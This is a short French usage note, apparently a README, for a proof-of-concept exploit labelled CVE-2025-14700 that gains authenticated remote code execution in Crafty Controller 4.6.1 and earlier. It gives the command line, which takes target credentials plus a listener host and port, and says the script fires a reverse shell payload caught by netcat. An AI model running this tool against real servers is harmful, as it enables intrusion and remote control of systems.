
Preuve de concept pour RCE authentifié dans Crafty Controller <= 4.6.1
Utilisation :
./CVE-2025-14700.py --url <crafty_controller_host> --login <username> --password <password> --lhost <listener_host> --lport <listener_port>
Ce script utilise netcat pour configurer un écouteur après avoir déclenché le payload de reverse shell, il ne fonctionnera pas si vous n'avez pas netcat sur votre machine d'écoute.